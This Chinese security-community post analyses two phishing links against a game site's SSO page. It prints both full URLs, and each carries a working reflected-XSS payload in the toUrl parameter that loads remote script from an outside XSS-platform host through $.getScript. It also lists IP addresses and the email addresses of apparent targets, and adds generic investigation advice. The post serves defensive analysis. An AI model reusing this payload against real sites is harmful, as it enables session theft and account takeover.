Locks012024-06-07文章来源:SecHub网络安全社区
链接中的主机名(hostname)并非是正常的游戏站点的域名,而是 “sso.swjoy.com”,这可能是钓鱼网站的域名。
参数 “toUrl” 中的值包含了非正常的字符,包括转义字符和单引号等,这可能是用来绕过输入验证和注入恶意脚本的。
链接中包含了一个恶意脚本,可以通过 jQuery 的 “$.getScript” 函数进行动态加载,从而向受害者的浏览器中注入恶意代码。
参数中的邮箱地址和时间戳是随机生成的,这可能是用来迷惑受害者的。
在这两个链接中,IP地址并没有直接暴露出来。钓鱼攻击者通常会使用一些技巧来隐藏其IP地址。
然而,我们可以从这些URL中分析出一些信息,例如:
根据这些信息,我们可以进行更深入的分析,例如:
但是,需要注意的是,即使找到了攻击者的IP地址,也不一定能够找到其真实身份或位置。攻击者可能使用代理服务器或虚拟专用服务器等技术来隐藏其真实IP地址。
它们的目的是欺骗用户点击链接并输入个人信息或下载恶意软件。在这种情况下,我们不建议您访问这些链接或尝试找出对方位置,因为这可能会导致您的个人信息被盗取或系统受到攻击。
这是两个钓鱼链接:
第一个:
http://sso.swjoy.com/front/sso/swjoy_zty_ad/qq?toUrl=https%3A%2F%2Fgamesite.swjoy.com%27%3B%24.getScript(%27https%3A//xssaq.com/1fmn%27)%3B//%3C/script%3E%3Cdiv%20style%3D%22display%3Anone%22%3E%3CtExtArEa%3E&Qid=445763&id=445763@qq.com&mail=zsj_bgsrs@nanhai.gov.cn&time=2022/3/910:14:08
第二个:
http://sso.swjoy.com/front/sso/swjoy_zty_ad/qq?toUrl=https%3A%2F%2Fgamesite.swjoy.com%27%3B%24.getScript(%27https%3A//xssaq.com/1fmn%27)%3B//%3C/script%3E%3Cdiv%20style%3D%22display%3Anone%22%3E%3CtExtArEa%3E&Qid=445763&id=445763@qq.com&mail=zouchengrui@dlut.edu.cn&time=2022/3/1616:13:30
115.236.57.11
115.236.57.8
115.236.57.9
115.236.57.10
115.236.57.11
115.236.57.8
115.236.57.9
115.236.57.10
首先,我们可以尝试通过访问链接中的URL地址,查看网站是否存在并了解与该网站相关的信息。例如,在这个例子中,URL中包含’swjoy’和’gamesite’这些关键词,我们可以尝试在搜索引擎中搜索这些关键词,以查找是否存在类似的网站或公司。如果这个链接指向一个假冒的网站,我们可能会发现其他受害者也报告了类似的钓鱼链接。
其次,我们可以查看链接中包含的电子邮件地址,这些电子邮件地址可能是钓鱼者使用的假冒地址。在这个例子中,我们看到了两个电子邮件地址:‘zsj_bgsrs@nanhai.gov.cn’和’zouchengrui@dlut.edu.cn’。我们可以尝试通过搜索引擎查找这些地址是否与公共机构或公司相关联,或者是否有其他人报告这些地址被用于钓鱼攻击。
我们还可以尝试查找IP地址和时间戳等信息,以查找可能的钓鱼者。在这个例子中,我们看到了时间戳,例如’2022/3/9 10:14:08’,我们可以尝试查找这个时间戳是否与其他的网络攻击或安全事件有关,例如通过查找是否有任何安全漏洞或恶意软件在这个时间袭击了其他用户。
最后,如果你的QQ号已经被盗取,你可以尝试联系QQ客服,向他们报告这些链接,并请求他们帮助你找到钓鱼者的信息,以便采取适当的措施保护你的账号和个人信息。
查找是否存在类似的网站或公司,这个链接指向一个假冒的网站,我们可能会发现其他受害者也报告了类似的钓鱼链接
查找这些地址是否与公共机构或公司相关联,或者是否有其他人报告这些地址被用于钓鱼攻击
我们看到了时间戳,例如’2022/3/9 10:14:08’,我们可以尝试查找这个时间戳是否与其他的网络攻击或安全事件有关,例如通过查找是否有任何安全漏洞或恶意软件在这个时间袭击了其他用户